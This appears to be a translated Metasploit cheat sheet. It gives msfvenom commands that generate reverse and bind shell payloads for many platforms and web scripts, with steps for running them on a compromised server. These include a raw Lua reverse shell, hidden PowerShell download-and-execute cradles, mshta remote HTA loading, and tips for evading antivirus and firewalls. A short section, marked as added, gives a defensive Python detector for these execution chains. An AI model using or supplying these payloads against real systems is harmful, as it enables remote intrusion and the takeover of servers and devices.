(1) Commonly used advanced parameter options

The parameters below are the ones the author uses most often; pick the ones that fit the target and your own needs. More advanced options are listed in my "Metasploit common commands cheat sheet". Be sure to practise with them, because you only learn their real effect by testing them yourself.

  1. LHOST: local IP address; RHOST: remote IP address; LPORT: local/remote port
  2. EXITFUNC: exit method, EXITFUNC=process (process) or EXITFUNC=thread (thread)
  3. set PrependMigrate true: enable process migration (default: false)
  4. set PrependMigrateProc explorer.exe: migrate into the process with this name, explorer.exe
  5. set SessionExpirationTimeout 0: session expiry of 0 seconds (the session never expires), default: 604800
  6. set SessionCommunicationTimeout 0: session communication timeout of 0 seconds (the session never times out), default: 300
  7. set EnableStageEncoding true: enable encoding of the transmitted stage payload (default: false)
  8. set EnableUnicodeEncoding true: enable Unicode encoding (default: false)
  9. set stageencoder x86/fnstenv_mov: set the stage encoder to x86/fnstenv_mov
  10. set HandlerSSLCert /tmp/772023.pem: path to the PEM-format SSL certificate used for HTTPS
  11. set StagerVerifySSLCert true: verify the HTTPS SSL certificate
  12. set ExitOnSession false: do not exit when a session is opened, keep the port listening (default: true)
  13. set AutoRunScript migrate -f: automatically run the migrate script, with the -f or -n argument
  14. set InitialAutoRunScript migrate -f: automatically run the migrate script, executed before AutoRunScript

(2) Generating common payload types

The Windows reverse_tcp jar payload can only be executed from a webshell when the IIS application pool runs under a built-in account (LocalService, LocalSystem or NetworkService); it cannot be executed under ApplicationPoolIdentity or a custom account.

1. Mac reverse_tcp macho

  1. root@kali:~# msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f macho > /tmp/mac.macho

2. Linux reverse_tcp elf

  1. root@kali:~# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f elf > /tmp/linux.elf

3. Android reverse_tcp apk

  1. root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/android.apk

4. Windows reverse_tcp exe

  1. root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/reverse.exe

5. Windows bind_tcp exe

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=999 -f exe > /tmp/bind.exe

6. Windows reverse_https exe

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f exe > /tmp/https.exe
  2. Run from the command line: C:\inetpub\wwwroot\> rundll32 C:\ProgramData\https.exe

7. Windows reverse_tcp dll

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f dll > /tmp/dll_x64.dll
  2. Run from the command line: C:\inetpub\wwwroot\> rundll32 C:\ProgramData\dll_x64.dll,Start or regsvr32 dll_x64.dll

8. Windows reverse_tcp jar

  1. root@kali:~# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f jar > /tmp/java.jar
  2. Run from the command line: C:\inetpub\wwwroot\> java -jar "C:\ProgramData\java.jar"

9. Script reverse_tcp aspx

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f aspx > /tmp/aspxweb.aspx
  2. Open in a browser: http://192.168.1.108/aspxweb.aspx

10. Script reverse_tcp php

  1. root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/phpweb.php
  2. root@kali:~# cat phpweb.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
  3. Open in a browser: http://192.168.1.108/phpweb.php

11. Script reverse_tcp jsp

  1. root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/jspweb.jsp (or warweb.war)
  2. Open in a browser: http://192.168.1.108:8080/jspweb.jsp

12. Script reverse_tcp perl

  1. root@kali:~# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/perl.pl
  2. Run from the command line: [/var/www/html/]$ perl /tmp/perl.pl

13. Script reverse_tcp ruby

  1. root@kali:~# msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/ruby.rb
  2. Run from the command line: [/var/www/html/]$ ruby /tmp/ruby.rb

14. Script reverse_tcp python

  1. root@kali:~# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/python.py
  2. Run from the command line: [/var/www/html/]$ python /tmp/python.py

15. Script reverse_lua lua

  1. root@kali:~# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.lua
  2. Run from the command line:
  3. [/var/www/html/]$ lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.120',443);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

16. Script reverse_bash bash

  1. root@kali:~# msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.sh
  2. Run from the command line: [/var/www/html/]$ bash /tmp/payload.sh

17. Script reverse_tcp nodejs

  1. root@kali:~# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.120 LPORT=443 -f raw > /tmp/payload.js
  2. Run from the command line: [/var/www/html/]$ nodejs /tmp/payload.js

18. Bypass hta_server mshta

  1. msf > use exploit/windows/misc/hta_server
  2. msf exploit(windows/misc/hta_server) > set target 1
  3. msf exploit(windows/misc/hta_server) > set payload windows/x64/meterpreter/reverse_tcp
  4. msf exploit(windows/misc/hta_server) > set lhost 192.168.1.120
  5. msf exploit(windows/misc/hta_server) > set lport 443
  6. msf exploit(windows/misc/hta_server) > exploit
  7. Run from the command line:
  8. C:\inetpub\wwwroot\> mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta

19. Bypass web_delivery powershell

  1. msf > use exploit/multi/script/web_delivery
  2. msf exploit(multi/script/web_delivery) > set target 2
  3. msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
  4. msf exploit(multi/script/web_delivery) > set lhost 192.168.1.120
  5. msf exploit(multi/script/web_delivery) > set lport 443
  6. msf exploit(multi/script/web_delivery) > set uripath /
  7. msf exploit(multi/script/web_delivery) > exploit
  8. Run from the command line:
  9. C:\inetpub\wwwroot\> powershell.exe -nop -w hidden -c $B=new-object net.webclient;$B.proxy=[Net.WebRequest]::GetSystemWebProxy();$B.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $B.downloadstring('http://192.168.1.120:8080/');

20. Bypass reverse_https powerShell

  1. root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/Powershell.ps1
  2. msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
  3. msf exploit(multi/handler) > set lhost 192.168.1.120
  4. msf exploit(multi/handler) > set lport 443
  5. msf exploit(multi/handler) > exploit
  6. Run from the command line:
  7. C:\inetpub\wwwroot\> powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.120/Powershell.ps1'); "
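Items 6, 7, 8, 18, 19 and 20 above all end the same way: a web-server worker process launches a Windows built-in (rundll32, regsvr32, java, mshta, powershell) that pulls its code from a user-writable directory or from a remote URL. From the defender's side that chain is what process-creation telemetry should flag. The script below is an added example, not part of the original page: it runs four simple rules over constructed process-creation events shaped like those command lines. The event tuples, the rule names and the directory list are assumptions made for this example, not real telemetry or a vendor's rule set.

```python
import re

# Constructed sample events (parent image, child image, child command line).
# They are invented to mirror the execution chains in items 6-8 and 18-20;
# the last two are benign controls.
SAMPLE_EVENTS = [
    ("w3wp.exe", "mshta.exe", "mshta http://192.168.1.120:8080/xc2Pvkpa3FU6Q.hta"),
    ("w3wp.exe", "powershell.exe",
     "powershell.exe -nop -w hidden -c $B=new-object net.webclient;"
     "IEX $B.downloadstring('http://192.168.1.120:8080/');"),
    ("w3wp.exe", "powershell.exe",
     "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://192.168.1.120/Powershell.ps1'); \""),
    ("w3wp.exe", "rundll32.exe", r"rundll32 C:\ProgramData\dll_x64.dll,Start"),
    ("w3wp.exe", "regsvr32.exe", r"regsvr32 dll_x64.dll"),
    ("w3wp.exe", "java.exe", r'java -jar "C:\ProgramData\java.jar"'),
    ("explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("services.exe", "rundll32.exe", r"rundll32 C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

# Web-server worker processes that should rarely spawn the binaries below (assumed list).
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "tomcat.exe"}
LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "powershell.exe", "cmd.exe", "java.exe"}

URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# Flags used to hide the window, skip the profile or bypass execution policy.
PS_STEALTH_RE = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|w\s+hidden|windowstyle\s+hidden|"
    r"exec\s+bypass|ep\s+bypass|executionpolicy\s+bypass)\b", re.I)
# A download cradle: DownloadString fed into IEX, in either order.
PS_CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\bdownloadstring\b|"
    r"\bdownloadstring\b.*\b(?:iex|invoke-expression)\b", re.I)
# Directories a web shell can typically write to (assumed list).
WRITABLE_DIR_RE = re.compile(r"\\(?:programdata|temp|tmp|inetpub|users\\public)\\", re.I)


def score_event(parent, image, cmdline):
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    parent_l, image_l = parent.lower(), image.lower()
    if parent_l in WEB_SERVER_PARENTS and image_l in LOLBINS:
        hits.append("webserver_spawned_lolbin")
    if image_l == "mshta.exe" and URL_RE.search(cmdline):
        hits.append("mshta_remote_hta")
    if (image_l == "powershell.exe" and PS_STEALTH_RE.search(cmdline)
            and PS_CRADLE_RE.search(cmdline)):
        hits.append("powershell_download_cradle")
    if image_l in {"rundll32.exe", "regsvr32.exe", "java.exe"} and WRITABLE_DIR_RE.search(cmdline):
        hits.append("module_from_writable_dir")
    return hits


def detect(events):
    """Run score_event over a batch and keep only the events that matched something."""
    alerts = []
    for parent, image, cmdline in events:
        hits = score_event(parent, image, cmdline)
        if hits:
            alerts.append((parent, image, hits))
    return alerts


if __name__ == "__main__":
    for parent, image, hits in detect(SAMPLE_EVENTS):
        print(f"{parent} -> {image}: {', '.join(hits)}")
```

The parent/child rule is the most durable of the four: the URL, directory and flag patterns can be rewritten by an attacker, but a web-server worker starting mshta or rundll32 is abnormal on almost any host and is exactly what the commands in items 18 to 20 produce when run from a webshell.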

(3) Notes

  1. Before choosing a payload, check whether the target server is 32-bit or 64-bit; only a payload of the correct architecture will succeed;
  2. 64-bit payload files generated by Metasploit evade detection and removal by Sophos Anti-Virus out of the box;
  3. If a firewall on the target blocks a normal TCP connection back to the attacking machine, try a bind_tcp payload to get around it;
  4. If the target is on an internal network protected by antivirus, uploaded tools such as port forwarders will be detected and removed; script payloads and similar methods can be used instead;
